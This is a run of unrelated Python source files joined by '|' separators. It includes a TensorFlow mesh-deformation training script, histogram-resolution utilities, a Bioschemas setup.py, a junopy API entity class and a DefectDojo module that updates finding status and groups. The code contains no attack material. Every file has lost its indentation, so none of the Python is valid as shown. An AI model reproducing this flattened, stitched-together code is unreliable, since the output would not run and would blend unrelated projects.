#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "src"))
import glob
import functools
import pickle
import argparse
import numpy as np
from sklearn.model_selection import train_test_split
import tensorflow as tf
from tensorflow.python.keras.optimizers import Adam, SGD
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import losses
from tensorflow.python.keras import models
from tensorflow.python.keras.utils import multi_gpu_model
from utils import buildImageDataset, construct_feed_dict
from custom_layers import *
from augmentation import change_intensity_img, _augment_deformnet
from dataset import get_baseline_dataset, get_baseline_dataset_deformnet
from model import DeformNet
from loss import mesh_loss_geometric_cf, point_loss_cf, binary_bce_dice_loss
from call_backs import *
"""# Set up"""
parser = argparse.ArgumentParser()
parser.add_argument('--im_trains', nargs='+',help='Name of the folder containing the image data')
parser.add_argument('--im_vals', nargs='+', help='Name of the folder containing the image data')
parser.add_argument('--pre_train', default='', help="Filename of the pretrained graph model")
parser.add_argument('--mesh', help='Name of the .dat file containing mesh info')
parser.add_argument('--mesh_txt', nargs='+', help='Name of the mesh_info.txt file with tmplt scale and center into')
parser.add_argument('--output', help='Name of the output folder')
parser.add_argument('--attr_trains', nargs='+', help='Attribute name of the folders containing tf records')
parser.add_argument('--attr_vals', nargs='+', help='Attribute name of the folders containing tf records')
parser.add_argument('--train_data_weights', type=float, nargs='+', help='Weights to apply for the samples in different datasets')
parser.add_argument('--val_data_weights', type=float, nargs='+', help='Weights to apply for the samples in different datasets')
parser.add_argument('--file_pattern', default='*.tfrecords', help='Pattern of the .tfrecords files')
parser.add_argument('--modality', nargs='+', help='Name of the modality, mr, ct, split by space')
parser.add_argument('--num_epoch', type=int, help='Maximum number of epochs to run')
parser.add_argument('--num_seg', type=int,default=1, help='Number of segmentation classes')
parser.add_argument('--seg_weight', type=float, default=1., help='Weight of the segmentation loss')
parser.add_argument('--mesh_ids', nargs='+', type=int, default=[2], help='Number of meshes to train')
parser.add_argument('--batch_size', type=int, default=10, help='Batch size')
parser.add_argument('--shuffle_buffer_size', type=int, default=10000, help='Shuffle buffer size')
parser.add_argument('--lr', type=float, help='Learning rate')
parser.add_argument('--cf_ratio', type=float, default=1., help='Loss ratio between gt chamfer loss and pred chamfer loss')
parser.add_argument('--size', type = int, nargs='+', help='Image dimensions')
parser.add_argument('--weights', type = float, nargs='+', help='Loss weights for geometric loss')
parser.add_argument('--hidden_dim', type = int, default=128, help='Hidden dimension')
parser.add_argument('--amplify_factor', type=float, default=1., help="amplify_factor of the predicted displacements")
args = parser.parse_args()
img_shape = (args.size[0], args.size[1], args.size[2], 1)
save_loss_path = args.output
save_model_path = os.path.join(args.output, "weights_gcn.hdf5")
""" Create new directories """
try:
os.makedirs(os.path.dirname(save_model_path))
os.makedirs(os.path.dirname(save_loss_path))
except Exception as e: print(e)
"""# Feed in mesh info"""
pkl = pickle.load(open(args.mesh, 'rb'))
mesh_info = construct_feed_dict(pkl)
mesh_info['mesh_center'] = [np.zeros(3) for i in range(len(args.mesh_ids))]
mesh_info['mesh_scale'] = [0 for i in range(len(args.mesh_ids))]
mesh_info['mesh_area'] = [0 for i in range(len(args.mesh_ids))]
mesh_info['edge_length_scaled'] = [np.zeros(3) for i in range(len(args.mesh_ids))] # 3 is number of blocks
for txt_fn in args.mesh_txt:
for i in range(len(args.mesh_ids)):
ctr_scale = np.loadtxt(txt_fn)
if len(ctr_scale.shape)==1:
ctr_scale = np.expand_dims(ctr_scale, axis=0)
mesh_info['mesh_center'][i] += ctr_scale[i, :-2]/len(args.modality)
mesh_info['mesh_scale'][i] += ctr_scale[i, -2]/len(args.modality)
mesh_info['mesh_area'][i] += ctr_scale[i, -1]/len(args.modality)
for i in range(len(args.mesh_ids)):
r = mesh_info['mesh_scale'][i]*2
scale = r * np.mean(args.size)
area_ratio = mesh_info['mesh_area'][i]/(4*np.pi*r*r)
mesh_info['edge_length_scaled'][i] = np.array(mesh_info['edge_length']) * scale * scale * area_ratio
print("Mesh center, scale: ", mesh_info['mesh_center'], mesh_info['mesh_scale'])
print("Mesh edge: ", mesh_info['edge_length_scaled'])
"""## Set up train and validation datasets
Note that we apply image augmentation to our training dataset but not our validation dataset.
"""
tr_cfg = {'change_intensity': {"scale": [0.9, 1.1],"shift": [-0.1, 0.1]}}
tr_preprocessing_fn = functools.partial(_augment_deformnet, **tr_cfg)
if_seg = True if args.num_seg>0 else False
val_preprocessing_fn = functools.partial(_augment_deformnet)
train_ds_list, val_ds_list = [], []
train_ds_num, val_ds_num = [], []
for data_folder_out, attr in zip(args.im_trains, args.attr_trains):
x_train_filenames_i = buildImageDataset(data_folder_out, args.modality, 41, mode='_train'+attr, ext=args.file_pattern)
train_ds_num.append(len(x_train_filenames_i))
train_ds_i = get_baseline_dataset_deformnet(x_train_filenames_i, preproc_fn=tr_preprocessing_fn, mesh_ids=args.mesh_ids, \
shuffle_buffer=args.shuffle_buffer_size, if_seg=if_seg)
train_ds_list.append(train_ds_i)
for data_val_folder_out, attr in zip(args.im_vals, args.attr_vals):
x_val_filenames_i = buildImageDataset(data_val_folder_out, args.modality, 41, mode='_val'+attr, ext=args.file_pattern)
val_ds_num.append(len(x_val_filenames_i))
val_ds_i = get_baseline_dataset_deformnet(x_val_filenames_i, preproc_fn=val_preprocessing_fn, mesh_ids=args.mesh_ids, \
shuffle_buffer=args.shuffle_buffer_size, if_seg=if_seg)
val_ds_list.append(val_ds_i)
train_data_weights = [w/np.sum(args.train_data_weights) for w in args.train_data_weights]
val_data_weights = [w/np.sum(args.val_data_weights) for w in args.val_data_weights]
print("Sampling probability for train and val datasets: ", train_data_weights, val_data_weights)
train_ds = tf.data.experimental.sample_from_datasets(train_ds_list, weights=train_data_weights)
train_ds = train_ds.batch(args.batch_size)
val_ds = tf.data.experimental.sample_from_datasets(val_ds_list, weights=val_data_weights)
val_ds = val_ds.batch(args.batch_size)
num_train_examples = train_ds_num[np.argmax(train_data_weights)]/np.max(train_data_weights)
num_val_examples = val_ds_num[np.argmax(val_data_weights)]/np.max(val_data_weights)
print("Number of train, val samples after reweighting: ", num_train_examples, num_val_examples)
"""# Build the model"""
model = DeformNet(args.batch_size, img_shape, mesh_info, amplify_factor=args.amplify_factor,num_mesh=len(args.mesh_ids), num_seg=args.num_seg)
unet_gcn = model.build_keras()
unet_gcn.summary(line_length=150)
adam = Adam(lr=args.lr, beta_1=0.9, beta_2=0.999, epsilon=None, decay=1e-6, amsgrad=True)
output_keys = [node.op.name.split('/')[0] for node in unet_gcn.outputs]
print("Output Keys: ", output_keys)
if args.num_seg >0:
losses = [ mesh_loss_geometric_cf(mesh_info, 3, args.weights, args.cf_ratio, mesh_info['edge_length_scaled'][(i-1)%len(args.mesh_ids)]) for i in range(1, len(output_keys))]
losses = [binary_bce_dice_loss] + losses
else:
losses = [ mesh_loss_geometric_cf(mesh_info, 3, args.weights, args.cf_ratio, mesh_info['edge_length_scaled'][i%len(args.mesh_ids)]) for i in range(len(output_keys))]
losses = dict(zip(output_keys, losses))
metric_loss, metric_key = [], []
for i in range(1, len(args.mesh_ids)+1):
metric_key.append(output_keys[-i])
metric_loss.append(point_loss_cf)
metrics_losses = dict(zip(metric_key, metric_loss))
metric_loss_weights = list(np.ones(len(args.mesh_ids)))
loss_weights = list(np.ones(len(output_keys)))
if args.num_seg > 0:
loss_weights[0] = args.seg_weight
unet_gcn.compile(optimizer=adam, loss=losses,loss_weights=loss_weights, metrics=metrics_losses)
""" Setup model checkpoint """
save_model_path = os.path.join(args.output, "weights_gcn.hdf5")
cp_cd = SaveModelOnCD(metric_key, save_model_path, patience=50)
lr_schedule = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.8, patience=10, min_lr=0.000005)
call_backs = [cp_cd,lr_schedule]
try:
if args.pre_train != '':
unet_gcn.load_weights(args.pre_train)
else:
unet_gcn.load_weights(save_model_path)
except Exception as e:
print("Model not loaded", e)
""" Training """
history =unet_gcn.fit(train_ds,
steps_per_epoch=int(np.ceil(num_train_examples/float(args.batch_size))),
epochs=args.num_epoch,
validation_data=val_ds,
validation_steps= int(np.ceil(num_val_examples / float(args.batch_size))),
callbacks=call_backs)
with open(save_loss_path+"_history", 'wb') as handle: # saving the history
pickle.dump(history.history, handle)
|
import warnings
import numpy as np
from xentropy.internal.pre_post_processing import start_end_from_grid
def is_power_of_two(val):
"""This function will evaluate whether $val is
a power of two between 1 and 524288 or not.
Higher powers are not tested here.
Parameters
----------
val : numeric
Returns
-------
bool
"""
pows_of_two = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048,
4096, 8192, 16384, 32768, 65536, 131072, 262144, 524288]
# val = int(val) # this will cut off decimals, therefore example: int(16.6) in pows_of_two -> True
return val in pows_of_two
def next_power_of_two(val):
"""Returns the next higher power of two.
Parameters
----------
val : numeric
Returns
-------
pow_of_two : int
"""
return int(2**(np.log(val) // np.log(2) + 1))
def is_integer(resolution):
return isinstance(resolution, int) or isinstance(resolution, np.int64) or \
isinstance(resolution, np.int) or isinstance(resolution, np.int32)
def is_float(resolution):
return isinstance(resolution, float) or isinstance(resolution, np.float64) or \
isinstance(resolution, np.float) or isinstance(resolution, np.float32)
def auto_dihedral_resolution(data):
data_size = len(data)
step = (np.sqrt(data_size*6)//64+1)*256
if not is_power_of_two(step):
step = next_power_of_two(step)
return np.min([int(step), 4096])
def minim_or_sqrt(data, minim=32):
return np.max([minim, square_root_choice(data)])
def interquartiles(data):
data = np.sort(data)
data_quarts = np.array_split(data, 4)
return data_quarts[1][0], data_quarts[-2][-1]
def scott(data):
bin_edges = np.histogram_bin_edges(data, bins="scott")
return len(bin_edges) - 1
def freedman_diaconis(data):
bin_edges = np.histogram_bin_edges(data, bins="fd")
return len(bin_edges)-1
def square_root_choice(data):
return int(np.ceil(np.sqrt(len(data))))
def sturges(data):
bin_edges = np.histogram_bin_edges(data, bins="sturges")
return len(bin_edges)-1
def doane(data):
bin_edges = np.histogram_bin_edges(data, bins="doane")
return len(bin_edges)-1
# below we have legacy functions, which we do not use
def silverman(data):
"""This is a legacy function"""
n_dat = len(data)
iqr = np.diff(interquartiles(data))[0]
either_or = np.min([np.std(data), iqr / 1.34])
return 0.9 * either_or * n_dat ** (-1 / 5)
def res_from_silverman(data):
"""This is a legacy function"""
start, end = start_end_from_grid(data)
data_range = end-start
predicted_bandw = silverman(data)
return data_range / predicted_bandw
def rules_of_thumb():
return {"auto": minim_or_sqrt,
"freedman_diaconis": freedman_diaconis, "fd": freedman_diaconis,
"sturges": sturges,
"doane": doane,
"sqrt": square_root_choice,
"scott": scott}
def rules_of_thumb_dihedral():
return {"auto": auto_dihedral_resolution,
"freedman_diaconis": freedman_diaconis, "fd": freedman_diaconis,
"sturges": sturges,
"doane": doane,
"sqrt": square_root_choice,
"scott": scott}
def resolution_from_rule_of_thumb(resolution, data, verbose=False, rules_of_thumb=rules_of_thumb()):
resolution = resolution.lower()
resolution = resolution.replace(" ", "_")
if not (resolution in list(rules_of_thumb.keys())):
err_msg = "Cannot interpret given argument for resolution. " \
"Give either an integer, or choose of the following:\n{}".format(rules_of_thumb.keys())
raise ValueError(err_msg)
data = np.squeeze(data) # you need to do this, because otherwise, you will have issues with single data sets...
squeezed_shape = data.shape
if len(squeezed_shape) == 1:
return rules_of_thumb[resolution](data)
elif len(squeezed_shape) == 2:
if verbose:
print("Found multiple data sets. Applying rule of thumb on all, and take the maximum resolution estimated.")
return np.max([rules_of_thumb[resolution](dat) for dat in data])
else: # bad paq. you really should handle this properly...
print("Suspicious data shape...")
return 4096
def process_resolution_argument(resolution, data, rules_of_thumb=rules_of_thumb(), verbose=False):
"""Warns about potentially too high or too low
values and picks the next higher power of two,
if it was no power of two initially.
Parameters
----------
resolution
data
Returns
-------
"""
if isinstance(resolution, str):
resolution = resolution_from_rule_of_thumb(resolution, data, verbose=verbose, rules_of_thumb=rules_of_thumb)
# will be checked for whether it is a power of two or not below
elif is_integer(resolution):
pass
elif is_float(resolution):
print("Resolution is not of type int. Trying to cast it to int...")
resolution = int(resolution)
else:
err_msg = "Cannot interpret given argument for resolution:\n{}\n" \
"Please give either a single integer or a string.".format(resolution)
raise ValueError(err_msg)
if resolution < 100:
warn_msg = "You are using a rather small resolution. " \
"This may potentially lead to inaccurate results..."
warnings.warn(warn_msg, RuntimeWarning)
elif resolution > 10000:
warn_msg = "You are using a rather large resolution. " \
"Amongst other things, this may potentially lead to very long runtimes " \
"without necessarily improving the accuracy of the result..."
warnings.warn(warn_msg, RuntimeWarning)
if not is_power_of_two(resolution):
resolution = next_power_of_two(resolution)
return resolution
|
CACHE_SIZE = 256
|
#!/usr/bin/env python
# SPDX-License-Identifer: MIT
# Copyright 2020 Heriot-Watt University, UK
# Copyright 2020 The University of Manchester, UK
#
__author__ = "Bioschemas.org community"
__copyright__ = """© 2020 Heriot-Watt University, UK
© 2020 The University of Manchester, UK
"""
__license__ = "MIT" # https://spdx.org/licenses/MIT
from setuptools import setup, find_packages
from codecs import open
from os import path
import re
# https://www.python.org/dev/peps/pep-0440/#appendix-b-parsing-version-strings-with-regular-expressions # noqa
PEP440_PATTERN = r"([1-9][0-9]*!)?(0|[1-9][0-9]*)(\.(0|[1-9][0-9]*))*((a|b|rc)(0|[1-9][0-9]*))?(\.post(0|[1-9][0-9]*))?(\.dev(0|[1-9][0-9]*))?" # noqa
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
with open(path.join(here, 'requirements.txt'), encoding='utf-8') as f:
required = f.read().splitlines()
with open(path.join(here, 'profilegenerator', '_version.py'), encoding='utf-8') as f:
# "parse" rocrate/_version.py which MUST have this pattern
# __version__ = "0.1.1"
# see https://www.python.org/dev/peps/pep-0440
v = f.read().strip()
m = re.match(r'^__version__ = "(' + PEP440_PATTERN + ')"$', v)
if not m:
msg = ('rocrate/_version.py did not match pattern '
'__version__ = "0.1.2" (see PEP440):\n') + v
raise Exception(msg)
__version__ = m.group(1)
setup(
name='profilegenerator',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
version=__version__, # update in rocrate/_version.py
description='BioSchemas Profile Generator',
long_description_content_type='text/markdown',
long_description=long_description,
author=('Alasdair J G Gray, Stian Soiland-Reyes'),
python_requires='>=3.6',
author_email='public-bioschemas@w3.org',
package_data={'': ['data/*.jsonld', 'templates/*.j2']},
license="MIT",
url='https://github.com/bioschemas/ProfileGenerator/',
download_url=('https://github.com/bioschemas/ProfileGenerator/archive/'
f'{__version__}.tar.gz'),
keywords="bioschemas schema.org jekyll profile",
install_requires=[required],
test_suite='test',
entry_points={
'console_scripts': ["bioschemas-profilegen=profilegenerator.main:main",
"schemaorg-example=profilegenerator.schemaorg:main"]
},
classifiers=[
'Operating System :: OS Independent',
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Database',
'Topic :: Internet',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'Topic :: Software Development :: Code Generators',
'Topic :: Utilities',
],
)
|
# -*- coding: utf-8 -*-
from .datatype import *
from junopy.utils.juno import *
__methods__ = ['toJSON', 'load', 'add', 'Create', 'Update', 'Get',
'Delete', 'Deactivate', 'Reactivate', 'Cancel', 'Complete', 'SendFiles']
def EncodeValue(o, format=None):
try:
if hasattr(o, 'toJSON'):
return o.toJSON()
if isinstance(o, decimal.Decimal):
return float(o)
if isinstance(o, datetime.datetime):
return o.strftime(format) if format != 'iso' else o.isoformat()
if isinstance(o, bytes):
return o.decode('utf-8')
return o
except Exception as e:
raise e
class JunoEntity():
def __init__(self, aliases=None, context=None, **kw):
self.__metadata__['data'] = {}
self.__metadata__['relasionships'] = {}
self.__context__ = context
self.load(**kw)
def load(self, **kw):
if len(kw) > 0:
for k in self.__dict__:
try:
if not k.startswith("__"):
if k in kw:
if self[k].__class__.__name__.startswith("Obj"):
self.add(k, kw[k])
else:
self[k].value = kw[k]
self.__metadata__['data'][k] = EncodeValue(
self[k].value, self[k].format)
except Exception as e:
raise Exception(f"Field [{k}] Value [{kw[k]}] Error : {e}")
def add(self, key=None, data=None):
if key and data and (isinstance(data, dict) or isinstance(data, list)):
if "List" in self[key].__class__.__name__:
if not key in self.__metadata__['relasionships']:
self.__metadata__['relasionships'][key] = []
self.__metadata__['relasionships'][key].extend(
data if isinstance(data, list) else [data])
if hasattr(data, 'values'):
self[key].value.extend([self[key].type(context={'entity': self, 'key': key}, **item) for item in data if any(item.values(
))] if isinstance(data, list) else [self[key].type(context={'entity': self, 'key': key}, **data)] if any(data.values()) else [])
elif isinstance(data, list):
self[key].value.extend([self[key].type(item) if isinstance(item, str) or isinstance(
item, int) else self[key].type(context={'entity': self, 'key': key}, **item) for item in data if not item is None])
else:
data = data[0] if isinstance(data, list) else data
if any(data.values()):
self.__metadata__['relasionships'][key] = data
self[key].value = self[key].type(context={'entity': self, 'key': key}, **data)
elif hasattr(data, '__class__') and data.__class__.__name__ == self[key].type.__name__:
self.__setattr__(key, data)
else:
raise Exception("entity.add requires key and dict of object data")
def __getitem__(self, field):
return super().__getattribute__(field) if hasattr(self, field) else None
def __getattribute__(self, field):
if field.startswith("__") or field in __methods__:
return super().__getattribute__(field)
else:
return super().__getattribute__(field).value
def __setattr__(self, item, value):
try:
if not item.startswith("__") and not "entity.datatype" in str(value.__class__):
if self[item]:
if hasattr(value, '__context__') and not value.__context__:
value.__context__ = self
self[item].value = value
self.__metadata__['data'][item] = EncodeValue(
self[item].value, self[item].format)
if self.__context__:
_context = self.__context__['entity']
_context_key = self.__context__['key']
if isinstance(_context[_context_key].value, list):
index = _context[_context_key].value.index(self)
_context.__metadata__[
'relasionships'][_context_key][index] = self.__metadata__['data']
else:
_context.__metadata__[
'relasionships'][_context_key] = self.__metadata__['data']
else:
super().__setattr__(item, value)
else:
super().__setattr__(item, value)
except Exception as e:
raise Exception(f"Field [{item}] Value [{value}] Error : {e}")
def toJSON(self):
try:
return {**self.__metadata__['data'], **self.__metadata__['relasionships']}
except Exception as e:
raise e
def Create(self, resourceToken=None):
if hasattr(self, '__route__'):
aditional_header = None
if not resourceToken is None:
aditional_header = {'resourceToken':resourceToken}
data = Post(self.__route__, self.toJSON(), aditional_header)
self.load(**data)
else:
raise Exception("Method Create not allowed this object")
return self
def Update(self):
if hasattr(self, '__route__'):
route = self.__route__
if hasattr(self, '__requireid__'):
if self.__requireid__ == True and self.id is None:
raise Exception("ID object required")
if self.id is not None and self.__requireid__ == True:
route = f"{route}/{self.id}"
self.id = None
data = Patch(route, self.toJSON())
self.load(**data)
else:
raise Exception("Method Update not allowed this object")
return self
def Get(self):
if hasattr(self, '__route__'):
route = self.__route__
if hasattr(self, '__requireid__'):
if self.__requireid__ == True and self.id is None:
raise Exception("ID object required")
route = f"{route}/{self.id}"
data = Get(route, {'resourceToken': self.resourceToken} if hasattr(
self, 'resourceToken') and not self.resourceToken is None else None)
self.load(**data)
else:
raise Exception("Method Get not allowed this object")
return self
def Delete(self):
if hasattr(self, '__route__'):
route = self.__route__
if hasattr(self, '__requireid__') and self.__requireid__ == True:
if self.id is None:
raise Exception("ID object required")
route = f"{route}/{self.id}"
Delete(route)
else:
raise Exception("Method Delete not allowed this object")
self = None
return None
|
from .common import experimental
from .pep542_testfile import *
|
from django.db.models.query_utils import Q
from django.db.models.signals import post_delete, pre_delete
from django.dispatch.dispatcher import receiver
from dojo.celery import app
from dojo.decorators import dojo_async_task, dojo_model_from_id, dojo_model_to_id
import logging
from time import strftime
from django.utils import timezone
from django.conf import settings
from fieldsignals import pre_save_changed
from dojo.utils import get_current_user, mass_model_updater, to_str_typed
from dojo.models import Engagement, Finding, Finding_Group, System_Settings, Test
logger = logging.getLogger(__name__)
deduplicationLogger = logging.getLogger("dojo.specific-loggers.deduplication")
OPEN_FINDINGS_QUERY = Q(active=True)
VERIFIED_FINDINGS_QUERY = Q(active=True, verified=True)
OUT_OF_SCOPE_FINDINGS_QUERY = Q(active=False, out_of_scope=True)
FALSE_POSITIVE_FINDINGS_QUERY = Q(active=False, duplicate=False, false_p=True)
INACTIVE_FINDINGS_QUERY = Q(active=False, duplicate=False, is_mitigated=False, false_p=False, out_of_scope=False)
ACCEPTED_FINDINGS_QUERY = Q(risk_accepted=True)
NOT_ACCEPTED_FINDINGS_QUERY = Q(risk_accepted=False)
WAS_ACCEPTED_FINDINGS_QUERY = Q(risk_acceptance__isnull=False) & Q(risk_acceptance__expiration_date_handled__isnull=False)
CLOSED_FINDINGS_QUERY = Q(is_mitigated=True)
# this signal is triggered just before a finding is getting saved
# and one of the status related fields has changed
# this allows us to:
# - set any depending fields such as mitigated_by, mitigated, etc.
# - update any audit log / status history
def pre_save_finding_status_change(sender, instance, changed_fields=None, **kwargs):
# some code is cloning findings by setting id/pk to None, ignore those, will be handled on next save
# if not instance.id:
# logger.debug('ignoring save of finding without id')
# return
logger.debug('%i: changed status fields pre_save: %s', instance.id or 0, changed_fields)
for field, (old, new) in changed_fields.items():
logger.debug("%i: %s changed from %s to %s" % (instance.id or 0, field, old, new))
user = None
if get_current_user() and get_current_user().is_authenticated:
user = get_current_user()
update_finding_status(instance, user, changed_fields)
# also get signal when id is set/changed so we can process new findings
pre_save_changed.connect(pre_save_finding_status_change, sender=Finding, fields=['id', 'active', 'verfied', 'false_p', 'is_mitigated', 'mitigated', 'mitigated_by', 'out_of_scope', 'risk_accepted'])
# pre_save_changed.connect(pre_save_finding_status_change, sender=Finding)
# post_save_changed.connect(pre_save_finding_status_change, sender=Finding, fields=['active', 'verfied', 'false_p', 'is_mitigated', 'mitigated', 'mitigated_by', 'out_of_scope'])
def update_finding_status(new_state_finding, user, changed_fields=None):
now = timezone.now()
logger.debug('changed fields: %s', changed_fields)
is_new_finding = not changed_fields or (changed_fields and len(changed_fields) == 1 and 'id' in changed_fields)
# activated
# reactivated
# closed / mitigated
# false positivized
# out_of_scopified
# marked as duplicate
# marked as original
if is_new_finding or 'is_mitigated' in changed_fields:
# finding is being mitigated
if new_state_finding.is_mitigated:
# when mitigating a finding, the meta fields can only be editted if allowed
logger.debug('finding being mitigated, set mitigated and mitigated_by fields')
if can_edit_mitigated_data(user):
# only set if it was not already set by user
# not sure if this check really covers all cases, but if we make it more strict
# it will cause all kinds of issues I believe with new findings etc
new_state_finding.mitigated = new_state_finding.mitigated or now
new_state_finding.mitigated_by = new_state_finding.mitigated_by or user
# finding is being "un"mitigated
else:
new_state_finding.mitigated = None
new_state_finding.mitigated_by = None
# people may try to remove mitigated/mitigated_by by accident
if new_state_finding.is_mitigated:
new_state_finding.mitigated = new_state_finding.mitigated or now
new_state_finding.mitigated_by = new_state_finding.mitigated_by or user
if is_new_finding or 'active' in changed_fields:
# finding is being (re)activated
if new_state_finding.active:
new_state_finding.false_p = False
new_state_finding.out_of_scope = False
new_state_finding.is_mitigated = False
new_state_finding.mitigated = None
new_state_finding.mitigated_by = None
else:
# finding is being deactivated
pass
if is_new_finding or 'verified' in changed_fields:
pass
if is_new_finding or 'false_p' in changed_fields or 'out_of_scope' in changed_fields:
# existing behaviour is that false_p or out_of_scope implies mitigated
if new_state_finding.false_p or new_state_finding.out_of_scope:
new_state_finding.mitigated = new_state_finding.mitigated or now
new_state_finding.mitigated_by = new_state_finding.mitigated_by or user
new_state_finding.is_mitigated = True
new_state_finding.active = False
new_state_finding.verified = False
# always reset some fields if the finding is not a duplicate
if not new_state_finding.duplicate:
new_state_finding.duplicate = False
new_state_finding.duplicate_finding = None
new_state_finding.last_status_update = now
def can_edit_mitigated_data(user):
return settings.EDITABLE_MITIGATED_DATA and user.is_superuser
def create_finding_group(finds, finding_group_name):
logger.debug('creating finding_group_create')
if not finds or len(finds) == 0:
raise ValueError('cannot create empty Finding Group')
finding_group_name_dummy = 'bulk group ' + strftime("%a, %d %b %Y %X", timezone.now().timetuple())
finding_group = Finding_Group(test=finds[0].test)
finding_group.creator = get_current_user()
finding_group.name = finding_group_name + finding_group_name_dummy
finding_group.save()
available_findings = [find for find in finds if not find.finding_group_set.all()]
finding_group.findings.set(available_findings)
# if user provided a name, we use that, else:
# if we have components, we may set a nice name but catch 'name already exist' exceptions
try:
if finding_group_name:
finding_group.name = finding_group_name
elif finding_group.components:
finding_group.name = finding_group.components
finding_group.save()
except:
pass
added = len(available_findings)
skipped = len(finds) - added
return finding_group, added, skipped
def add_to_finding_group(finding_group, finds):
added = 0
skipped = 0
available_findings = [find for find in finds if not find.finding_group_set.all()]
finding_group.findings.add(*available_findings)
added = len(available_findings)
skipped = len(finds) - added
return finding_group, added, skipped
def remove_from_finding_group(finds):
removed = 0
skipped = 0
affected_groups = set()
for find in finds:
groups = find.finding_group_set.all()
if not groups:
skipped += 1
continue
for group in find.finding_group_set.all():
group.findings.remove(find)
affected_groups.add(group)
removed += 1
return affected_groups, removed, skipped
def update_finding_group(finding, finding_group):
# finding_group = Finding_Group.objects.get(id=group)
if finding_group is not None:
if finding_group != finding.finding_group:
if finding.finding_group:
logger.debug('removing finding %d from finding_group %s', finding.id, finding.finding_group)
finding.finding_group.findings.remove(finding)
logger.debug('adding finding %d to finding_group %s', finding.id, finding_group)
finding_group.findings.add(finding)
else:
if finding.finding_group:
logger.debug('removing finding %d from finding_group %s', finding.id, finding.finding_group)
finding.finding_group.findings.remove(finding)
def get_group_by_group_name(finding, finding_group_by_option):
if finding_group_by_option == 'component_name':
group_name = finding.component_name if finding.component_name else 'None'
elif finding_group_by_option == 'component_name+component_version':
group_name = '%s:%s' % ((finding.component_name if finding.component_name else 'None'),
(finding.component_version if finding.component_version else 'None'))
elif finding_group_by_option == 'file_path':
group_name = 'Filepath %s' % (finding.file_path if finding.file_path else 'None')
else:
raise ValueError("Invalid group_by option %s" % finding_group_by_option)
return 'Findings in: %s' % group_name
def group_findings_by(finds, finding_group_by_option):
grouped = 0
groups_created = 0
groups_existing = 0
skipped = 0
affected_groups = set()
for find in finds:
if find.finding_group is not None:
skipped += 1
continue
group_name = get_group_by_group_name(find, finding_group_by_option)
finding_group = Finding_Group.objects.filter(name=group_name).first()
if not finding_group:
finding_group, added, skipped = create_finding_group([find], group_name)
groups_created += 1
grouped += added
skipped += skipped
else:
add_to_finding_group(finding_group, [find])
groups_existing += 1
grouped += 1
affected_groups.add(finding_group)
return affected_groups, grouped, skipped, groups_created
def add_finding_to_auto_group(finding, group_by):
test = finding.test
name = get_group_by_group_name(finding, group_by)
finding_group, created = Finding_Group.objects.get_or_create(test=test, creator=get_current_user(), name=name)
if created:
logger.debug('Created Finding Group %d:%s for test %d:%s', finding_group.id, finding_group, test.id, test)
finding_group.findings.add(finding)
@dojo_model_to_id
@dojo_async_task
@app.task
@dojo_model_from_id
def post_process_finding_save(finding, dedupe_option=True, false_history=False, rules_option=True, product_grading_option=True,
issue_updater_option=True, push_to_jira=False, user=None, *args, **kwargs):
system_settings = System_Settings.objects.get()
# STEP 1 run all status changing tasks sequentially to avoid race conditions
if dedupe_option:
if finding.hash_code is not None:
if system_settings.enable_deduplication:
from dojo.utils import do_dedupe_finding
do_dedupe_finding(finding, *args, **kwargs)
else:
deduplicationLogger.debug("skipping dedupe because it's disabled in system settings")
else:
deduplicationLogger.warning("skipping dedupe because hash_code is None")
if false_history:
if system_settings.false_positive_history:
from dojo.utils import do_false_positive_history
do_false_positive_history(finding, *args, **kwargs)
else:
deduplicationLogger.debug("skipping false positive history because it's disabled in system settings")
# STEP 2 run all non-status changing tasks as celery tasks in the background
if issue_updater_option:
from dojo.tools import tool_issue_updater
tool_issue_updater.async_tool_issue_update(finding)
if product_grading_option:
if system_settings.enable_product_grade:
from dojo.utils import calculate_grade
calculate_grade(finding.test.engagement.product)
else:
deduplicationLogger.debug("skipping product grading because it's disabled in system settings")
# Adding a snippet here for push to JIRA so that it's in one place
if push_to_jira:
logger.debug('pushing finding %s to jira from finding.save()', finding.pk)
import dojo.jira_link.helper as jira_helper
# current approach is that whenever a finding is in a group, the group will be pushed to JIRA
# based on feedback we could introduct another push_group_to_jira boolean everywhere
# but what about the push_all boolean? Let's see how this works for now and get some feedback.
if finding.has_jira_issue or not finding.finding_group:
jira_helper.push_to_jira(finding)
elif finding.finding_group:
jira_helper.push_to_jira(finding.finding_group)
@receiver(pre_delete, sender=Finding)
def finding_pre_delete(sender, instance, **kwargs):
logger.debug('finding pre_delete: %d', instance.id)
# this shouldn't be necessary as Django should remove any Many-To-Many entries automatically, might be a bug in Django?
# https://code.djangoproject.com/ticket/154
instance.found_by.clear()
instance.status_finding.clear()
def finding_delete(instance, **kwargs):
logger.debug('finding delete, instance: %s', instance.id)
# the idea is that the engagement/test pre delete already prepared all the duplicates inside
# the test/engagement to no longer point to any original so they can be safely deleted.
# so if we still find that the finding that is going to be delete is an original, it is either
# a manual / single finding delete, or a bulke delete of findings
# in which case we have to process all the duplicates
# TODO: should we add the prepocessing also to the bulk edit form?
logger.debug('finding_delete: refresh from db: pk: %d', instance.pk)
try:
instance.refresh_from_db()
except Finding.DoesNotExist:
# due to cascading deletes, the current finding could have been deleted already
# but django still calls delete() in this case
return
duplicate_cluster = instance.original_finding.all()
if duplicate_cluster:
reconfigure_duplicate_cluster(instance, duplicate_cluster)
else:
logger.debug('no duplicate cluster found for finding: %d, so no need to reconfigure', instance.id)
